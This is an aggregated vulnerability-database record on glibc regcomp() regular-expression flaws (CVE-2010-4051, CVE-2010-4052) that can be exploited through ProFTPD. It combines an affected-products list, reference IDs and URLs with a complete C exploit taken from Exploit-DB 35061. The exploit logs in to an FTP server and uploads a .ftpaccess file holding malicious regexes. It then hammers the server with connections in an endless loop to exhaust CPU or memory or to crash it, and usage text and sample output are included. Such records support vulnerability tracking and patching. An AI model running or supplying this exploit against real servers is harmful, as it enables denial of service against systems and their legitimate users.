vendor:	juniper	model:	junos	scope:	eq	version:	11.2	Trust: 0.3
vendor:	juniper	model:	junos 11.1r5	scope:	-	version:	-	Trust: 0.3
vendor:	juniper	model:	junos 11.1r4	scope:	-	version:	-	Trust: 0.3
vendor:	juniper	model:	junos	scope:	eq	version:	11.1	Trust: 0.3
vendor:	juniper	model:	junos 10.4s14	scope:	-	version:	-	Trust: 0.3
vendor:	juniper	model:	junos 10.4r7	scope:	-	version:	-	Trust: 0.3
vendor:	juniper	model:	junos 10.4r6	scope:	-	version:	-	Trust: 0.3
vendor:	juniper	model:	junos 10.4r14	scope:	-	version:	-	Trust: 0.3
vendor:	juniper	model:	junos 10.4r13	scope:	-	version:	-	Trust: 0.3
vendor:	juniper	model:	junos 10.4r11	scope:	-	version:	-	Trust: 0.3
vendor:	juniper	model:	junos	scope:	eq	version:	10.4	Trust: 0.3
vendor:	juniper	model:	junos	scope:	eq	version:	10.3	Trust: 0.3
vendor:	juniper	model:	junos 10.2r3	scope:	-	version:	-	Trust: 0.3
vendor:	juniper	model:	junos 10.2r2	scope:	-	version:	-	Trust: 0.3
vendor:	juniper	model:	junos	scope:	eq	version:	10.2	Trust: 0.3
vendor:	juniper	model:	junos	scope:	eq	version:	10.1	Trust: 0.3
vendor:	juniper	model:	junos 10.0s28	scope:	-	version:	-	Trust: 0.3
vendor:	juniper	model:	junos 10.0s18	scope:	-	version:	-	Trust: 0.3
vendor:	gnu	model:	glibc	scope:	eq	version:	0	Trust: 0.3
vendor:	apple	model:	safari	scope:	eq	version:	7.0.2	Trust: 0.3
vendor:	juniper	model:	junos 13.3r1	scope:	ne	version:	-	Trust: 0.3
vendor:	juniper	model:	junos 13.2r2	scope:	ne	version:	-	Trust: 0.3
vendor:	juniper	model:	junos 13.1r3-s1	scope:	ne	version:	-	Trust: 0.3
vendor:	juniper	model:	junos 12.3r4	scope:	ne	version:	-	Trust: 0.3
vendor:	juniper	model:	junos 12.2r6	scope:	ne	version:	-	Trust: 0.3
vendor:	juniper	model:	junos 12.1x46-d10	scope:	ne	version:	-	Trust: 0.3
vendor:	juniper	model:	junos 12.1x45-d15	scope:	ne	version:	-	Trust: 0.3
vendor:	juniper	model:	junos 12.1x44-d25	scope:	ne	version:	-	Trust: 0.3
vendor:	juniper	model:	junos 12.1r8	scope:	ne	version:	-	Trust: 0.3
vendor:	juniper	model:	junos 11.4r9-s1	scope:	ne	version:	-	Trust: 0.3
vendor:	juniper	model:	junos 11.4r10	scope:	ne	version:	-	Trust: 0.3
vendor:	juniper	model:	junos 10.4s15	scope:	ne	version:	-	Trust: 0.3
vendor:	juniper	model:	junos 10.4r16	scope:	ne	version:	-	Trust: 0.3
vendor:	pureftpd	model:	pure-ftpd	scope:	eq	version:	1.0.31	Trust: 0.3
vendor:	pureftpd	model:	pure-ftpd	scope:	eq	version:	1.0.30	Trust: 0.3
vendor:	pureftpd	model:	pure-ftpd	scope:	eq	version:	1.0.29	Trust: 0.3
vendor:	openbsd	model:	openbsd	scope:	eq	version:	4.8	Trust: 0.3
vendor:	openbsd	model:	openbsd	scope:	eq	version:	4.3	Trust: 0.3
vendor:	openbsd	model:	openbsd	scope:	eq	version:	4.2	Trust: 0.3
vendor:	openbsd	model:	openbsd	scope:	eq	version:	4.1	Trust: 0.3
vendor:	openbsd	model:	openbsd	scope:	eq	version:	4.0	Trust: 0.3
vendor:	netbsd	model:	netbsd	scope:	eq	version:	5.0.1	Trust: 0.3
vendor:	netbsd	model:	netbsd	scope:	eq	version:	5.1	Trust: 0.3
vendor:	netbsd	model:	rc3	scope:	eq	version:	5.0	Trust: 0.3
vendor:	mandriva	model:	linux mandrake x86 64	scope:	eq	version:	2010.1	Trust: 0.3
vendor:	mandriva	model:	linux mandrake	scope:	eq	version:	2010.1	Trust: 0.3
vendor:	mandriva	model:	linux mandrake x86 64	scope:	eq	version:	2009.0	Trust: 0.3
vendor:	mandriva	model:	linux mandrake	scope:	eq	version:	2009.0	Trust: 0.3
vendor:	mandrakesoft	model:	enterprise server x86 64	scope:	eq	version:	5	Trust: 0.3
vendor:	mandrakesoft	model:	enterprise server	scope:	eq	version:	5	Trust: 0.3
vendor:	mandrakesoft	model:	corporate server x86 64	scope:	eq	version:	4.0	Trust: 0.3
vendor:	mandrakesoft	model:	corporate server	scope:	eq	version:	4.0	Trust: 0.3
vendor:	gentoo	model:	linux	scope:	-	version:	-	Trust: 0.3
vendor:	pureftpd	model:	pure-ftpd	scope:	ne	version:	1.0.32	Trust: 0.3

EXPLOIT

// source: https://www.securityfocus.com/bid/45233/info

GNU glibc is prone to a denial-of-service vulnerability due to stack exhaustion.

Successful exploits will allow attackers to make the affected computer unresponsive, denying service to legitimate users.

This issue affects unknown versions of the glibc library. This BID will be updated when more details become available.

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <netdb.h>

proftpd multiple exploit for VU#912279 (only with GNU libc/regcomp(3))
by Maksymilian Arciemowicz

References:
http://www.kb.cert.org/vuls/id/912279
http://cxib.net/
http://securityreason.com/

Tested:
Ubuntu + proftpd

This exploit need writing privileges to create .ftpaccess file with vulnerable regular expressions. Works well only under Linux

172.16.124.1 - NetBSD 5.1 (HACKER)
172.16.124.134 - Ubuntu 10.10 (TARGET)

PoC1:
.exitcx@cx64:~/advs/done$ ./reg1 172.16.124.134 21 cx password 172.16.124.1 1

Try create .ftpaccess with HideFiles "(\.ftpaccess|(.*{10,}{10,}{10,}{10,}))$"
...
send: stat .

send: USER cx
PASS password

send: stat .

Can`t connect
.exit
cx@cx64:~/advs/done$ telnet 172.16.124.134 21
Trying 172.16.124.134...
telnet: Unable to connect to remote host: Connection refused

Resume:
- created .ftpaccess file, and connect<=>disconnect
It will create a lot of proftpd children with 100% CPU usage.

If we try

./reg1 172.16.124.134 21 cx password 172.16.124.1 3

any proftpd children will generate memory exhausion

Options:
1 - cpu resource exhausion
2 - crash (recursion)
3 - memory resource exhausion
4 - possible crash with (ulimit {-v|-m})

char expl0[]="HideFiles \"(\\.ftpaccess|(.*{10,}{10,}{10,}{10,}))$\""; //CVE-2010-4052 Long execution
char expl1[]="HideFiles \"(\\.ftpaccess|(.*{10,}{10,}{10,}{10,}{10,}))$\""; //CVE-2010-4051 Crash
char expl2[]="HideFiles \"(.*+++++++++++++++++++++++++++++(\\w+))\""; // memory exhausion
char expl3[]="HideFiles \"(.*++++++++++++++++++++++++++++++(\\w+))\""; // if virtual memory limited, crash

int sendftp(int stream,char *what){
if(-1==send(stream,what,strlen(what),0))
printf("Can't send %s\n",what);
else
printf("send: %s\n",what);

bzero(what,sizeof(what));
}

void readftp(int stream,int flag){
if(flag==1) flag=MSG_DONTWAIT;
else flag=0;
char *readline=malloc(sizeof(char)*(4096+1));
memset(readline,'\x00',(4096+1));
if(recv(stream,readline,4096,flag)<1){
printf("Can't read from stream\n");
if(readline) free(readline);
close(stream);
exit(1);
}
else{
if(readline)
write(1, readline, strlen(readline));
fflush(stdout);
}
free(readline);
}

int attack(host,port,login,pass)
char *host,*port,*login,*pass;
{
char buffer[1024]; // send ftp command buffor
int sockfd,n,error;
struct addrinfo hints;
struct addrinfo *res, *res0;

memset(&hints, 0, sizeof(hints));
hints.ai_family = PF_UNSPEC;
hints.ai_socktype = SOCK_STREAM;
error = getaddrinfo(host,port,&hints,&res0);

if (error){
errorcon:
printf("Can`t connect\n.exit");
exit(1);
}

if((sockfd=socket(res0->ai_family,res0->ai_socktype,res0->ai_protocol))<0) goto errorcon;
if(-1==connect(sockfd,res0->ai_addr,res0->ai_addrlen)) goto errorcon;

snprintf(buffer,1024,"USER %s\nPASS %s\n",login,pass);
sendftp(sockfd,buffer);

bzero(buffer,1024);
snprintf(buffer,1024,"STAT .\n");
sendftp(sockfd,buffer);

freeaddrinfo(res0);
close(sockfd);
}

void exploreip(char *ip, int (*ipnum)[4]){
char *wsk;

wsk=(char *)strtok(ip,".");
(*ipnum)[0]=atoi(wsk);
wsk=(char *)strtok(NULL,".");
(*ipnum)[1]=atoi(wsk);
wsk=(char *)strtok(NULL,".");
(*ipnum)[2]=atoi(wsk);
wsk=(char *)strtok(NULL,".");
(*ipnum)[3]=atoi(wsk);
}

int createexpl(host,port,login,pass,lip,pattern)
char *host,*port,*login,*pass,*lip,*pattern;
{
char buffer[1024]; // send ftp command buffor
int ipnum[4];

int sockfd,n,error,sendstream,binarystream,sendport = (1024 + getpid());

struct addrinfo hints;
struct addrinfo *res, *res0;
struct sockaddr_in remo, loca;

int len = sizeof(remo);

memset(&hints, 0, sizeof(hints));
hints.ai_family = PF_UNSPEC;
hints.ai_socktype = SOCK_STREAM;
error = getaddrinfo(host,port,&hints,&res0);

if (error){
errorcon:

if(sendstream) close(sendstream);
printf("Can`t connect\n.exit");
exit(1);
}

if((sockfd=socket(res0->ai_family,res0->ai_socktype, res0->ai_protocol))<0) goto errorcon;
if(-1==connect(sockfd,res0->ai_addr,res0->ai_addrlen)) goto errorcon;

readftp(sockfd,1024);
snprintf(buffer,1024,"USER %s\nPASS %s\n",login,pass);
sendftp(sockfd,buffer);
readftp(sockfd,1024);
readftp(sockfd,1024);

exploreip(lip,&ipnum);
snprintf(buffer,1024,"TYPE I\nPORT %d,%d,%d,%d,%d,%d\n",ipnum[0],ipnum[1],ipnum[2],ipnum[3],sendport/256,sendport%256);
sendftp(sockfd,buffer);
readftp(sockfd,1024);

bzero(&loca, sizeof(loca));
loca.sin_family = AF_INET;
loca.sin_port=htons(sendport);
loca.sin_addr.s_addr = htonl(INADDR_ANY);

if((sendstream=socket(AF_INET, SOCK_STREAM,0))<0) goto errorcon;
if((bind(sendstream, (struct sockaddr *) &loca, sizeof(loca)))<0) goto errorcon;
if(listen(sendstream, 10) < 0) goto errorcon;

snprintf(buffer,1024,"STOR .ftpaccess\n");
sendftp(sockfd,buffer);

readftp(sockfd,1024);

if((binarystream=accept(sendstream,(struct sockaddr *)&remo,&len)) < 0) goto errorcon;
write(binarystream,pattern,strlen(pattern));

freeaddrinfo(res0);
close(sendstream);
printf("Created .ftpaccess file with %s\nIt`s time to attack...\n",pattern);
sleep(3);

return 0;
}

void usage(){
printf("Use: ./exploit target_ip port username password [your_ip] [option]\n\nCreate .ftpaccess with selected attack\noptions:\n1 - Long execution CVE-2010-4052\n2 - Recursion Crash CVE-2010-4051\n3 - Memory exhausion \n4 - Crash if virtual memory limited\n\n");
exit(1);
}

int main(int argc,char *argv[])
{

char *login,*pass,*lip=NULL;
char logindef[]="anonymous",passdef[]="cx@127.0.0.1";

printf("This is exploit for ERE (GNU libc)\nby Maksymilian Arciemowicz\n\n");

if(argc<3) usage();

char *host=argv[1];
char *port=argv[2];

if(4<=argc) login=argv[3];
else login=logindef;

if(5<=argc) pass=argv[4];
else pass=passdef;

if(6<=argc) lip=argv[5];

if(7<=argc) switch(atoi(argv[6])){
case 1:
printf("Try create .ftpaccess with %s\n\n",expl0);
createexpl(host,port,login,pass,lip,expl0);
break;

case 2:
printf("Try create .ftpaccess with %s\n\n",expl1);
createexpl(host,port,login,pass,lip,expl1);
break;

case 3:
printf("Try create .ftpaccess with %s\n\n",expl2);
createexpl(host,port,login,pass,lip,expl2);
break;

case 4:
printf("Try create .ftpaccess with %s\n\n",expl3);
createexpl(host,port,login,pass,lip,expl3);
break;

default:
usage();
break;
};

while(1) attack(host,port,login,pass);

return 0; // never happen
}

Trust: 1.0

sources: EXPLOIT-DB: 35061

EXPLOIT LANGUAGE

Trust: 0.6

sources: EXPLOIT-DB: 35061

PRICE

free

Trust: 0.6

sources: EXPLOIT-DB: 35061

TYPE

'regcomp()' Stack Exhaustion Denial of Service

Trust: 1.0

sources: EXPLOIT-DB: 35061

CREDITS

Maksymilian Arciemowicz

Trust: 0.6

sources: EXPLOIT-DB: 35061

EXTERNAL IDS

db:	NVD	id:	CVE-2010-4052	Trust: 5.1
db:	CERT/CC	id:	VU#912279	Trust: 4.1
db:	NVD	id:	CVE-2010-2632	Trust: 3.6
db:	NVD	id:	CVE-2010-4051	Trust: 3.5
db:	NVD	id:	CVE-2011-0418	Trust: 3.1
db:	EXPLOIT-DB	id:	35061	Trust: 1.9
db:	BID	id:	45233	Trust: 1.9
db:	CXSECURITY	id:	WLB-2010100135	Trust: 1.8
db:	CXSECURITY	id:	WLB-2011050004	Trust: 1.8
db:	JUNIPER	id:	JSA10612	Trust: 1.4
db:	CXSECURITY	id:	WLB-2011030145	Trust: 1.2
db:	NVD	id:	CVE-2011-3336	Trust: 1.0
db:	EDBNET	id:	78100	Trust: 0.6
db:	EDBNET	id:	56301	Trust: 0.6
db:	CXSECURITY	id:	WLB-2013010233	Trust: 0.6
db:	CXSECURITY	id:	WLB-2013020003	Trust: 0.6
db:	EDBNET	id:	75213	Trust: 0.6
db:	EDBNET	id:	63259	Trust: 0.6
db:	EDBNET	id:	75724	Trust: 0.6
db:	EDBNET	id:	81502	Trust: 0.6
db:	PACKETSTORM	id:	106589	Trust: 0.5
db:	SREASON	id:	7822	Trust: 0.5
db:	PACKETSTORM	id:	94556	Trust: 0.5
db:	PACKETSTORM	id:	120032	Trust: 0.5
db:	CXSECURITY	id:	WLB-2011010121	Trust: 0.5
db:	CXSECURITY	id:	WLB-2011110082	Trust: 0.5
db:	PACKETSTORM	id:	125725	Trust: 0.5
db:	PACKETSTORM	id:	97315	Trust: 0.5
db:	NVD	id:	CVE-2010-4754	Trust: 0.5
db:	NVD	id:	CVE-2010-4755	Trust: 0.5
db:	NVD	id:	CVE-2010-4756	Trust: 0.5
db:	PACKETSTORM	id:	101052	Trust: 0.5
db:	BID	id:	43819	Trust: 0.3
db:	CXSECURITY	id:	WLB-2014030108	Trust: 0.3
db:	BID	id:	47671	Trust: 0.3

REFERENCES

url:	https://nvd.nist.gov/vuln/detail/cve-2010-4052	Trust: 3.1
url:	https://www.intelligentexploit.com	Trust: 3.0
url:	https://nvd.nist.gov/vuln/detail/cve-2010-4051	Trust: 1.5
url:	https://nvd.nist.gov/vuln/detail/cve-2011-3336	Trust: 1.0
url:	https://nvd.nist.gov/vuln/detail/cve-2010-2632	Trust: 1.0
url:	https://nvd.nist.gov/vuln/detail/cve-2011-0418	Trust: 1.0
url:	https://www.securityfocus.com/bid/45233/info	Trust: 1.0
url:	http://www.sun.com/software/solaris/	Trust: 0.6
url:	http://www.openbsd.org	Trust: 0.6
url:	http://www.netbsd.org/	Trust: 0.6
url:	http://www.gnu.org/software/libc/	Trust: 0.6
url:	https://www.exploit-db.com/exploits/35061/	Trust: 0.6
url:	http://support.avaya.com/css/p8/documents/100150582	Trust: 0.3
url:	http://support.avaya.com/css/p8/documents/100127892	Trust: 0.3
url:	http://www.freebsd.org/	Trust: 0.3
url:	http://www.oracle.com/technetwork/topics/security/cpujan2011-194091.html	Trust: 0.3
url:	http://securityreason.com/achievement_securityalert/89	Trust: 0.3
url:	http://cxsecurity.com/issue/wlb-2014030108	Trust: 0.3
url:	https://www.exploit-db.com/exploits/35061	Trust: 0.3
url:	http://www.kb.cert.org/vuls/id/912279	Trust: 0.3
url:	http://kb.juniper.net/infocenter/index?page=content&id=jsa10612	Trust: 0.3
url:	http://cvsweb.netbsd.org/bsdweb.cgi/src/lib/libc/gen/glob.c	Trust: 0.3
url:	http://cvsweb.netbsd.org/bsdweb.cgi/src/lib/libc/gen/glob.c.diff?r1=text&tr1=1.27&r2=text&tr2=1.29	Trust: 0.3
url:	http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gen/glob.c.diff?r1=1.34;r2=1.35;f=h	Trust: 0.3
url:	http://www.securityreason.com/achievement_securityalert/97	Trust: 0.3

SOURCES

db:	BID	id:	43819
db:	BID	id:	45233
db:	BID	id:	47671
db:	PACKETSTORM	id:	106589
db:	PACKETSTORM	id:	94556
db:	PACKETSTORM	id:	120032
db:	PACKETSTORM	id:	125725
db:	PACKETSTORM	id:	97315
db:	PACKETSTORM	id:	101052
db:	EXPLOIT-DB	id:	35061
db:	EDBNET	id:	78100
db:	EDBNET	id:	56301
db:	EDBNET	id:	75213
db:	EDBNET	id:	63259
db:	EDBNET	id:	75724
db:	EDBNET	id:	81502

LAST UPDATE DATE

2024-03-21T15:10:28.311000+00:00

SOURCES UPDATE DATE

db:	BID	id:	43819	date:	2013-10-16T01:44:00
db:	BID	id:	45233	date:	2015-04-13T22:12:00
db:	BID	id:	47671	date:	2015-04-13T21:51:00

SOURCES RELEASE DATE

db:	BID	id:	43819	date:	2010-10-06T00:00:00
db:	BID	id:	45233	date:	2010-12-07T00:00:00
db:	BID	id:	47671	date:	2011-05-02T00:00:00
db:	PACKETSTORM	id:	106589	date:	2011-11-04T15:20:33
db:	PACKETSTORM	id:	94556	date:	2010-10-08T00:29:28
db:	PACKETSTORM	id:	120032	date:	2013-02-02T18:11:11
db:	PACKETSTORM	id:	125725	date:	2014-03-14T11:11:11
db:	PACKETSTORM	id:	97315	date:	2011-01-07T22:06:47
db:	PACKETSTORM	id:	101052	date:	2011-05-03T00:07:21
db:	EXPLOIT-DB	id:	35061	date:	2010-12-07T00:00:00
db:	EDBNET	id:	78100	date:	2014-03-14T00:00:00
db:	EDBNET	id:	56301	date:	2010-12-07T00:00:00
db:	EDBNET	id:	75213	date:	2013-02-01T00:00:00
db:	EDBNET	id:	63259	date:	2011-11-09T00:00:00
db:	EDBNET	id:	75724	date:	2013-04-11T00:00:00
db:	EDBNET	id:	81502	date:	2015-09-30T00:00:00

tag:	exploit	Trust: 3.0
tag:	denial of service	Trust: 1.5
tag:	proof of concept	Trust: 0.5
tag:	remote	Trust: 0.5
tag:	overflow	Trust: 0.5
tag:	vulnerability	Trust: 0.5

ID

CVE

EDB ID

TITLE

DESCRIPTION

AFFECTED PRODUCTS

EXPLOIT

EXPLOIT LANGUAGE

PRICE

TYPE

TAGS

CREDITS

EXTERNAL IDS

REFERENCES

SOURCES

LAST UPDATE DATE

SOURCES UPDATE DATE

SOURCES RELEASE DATE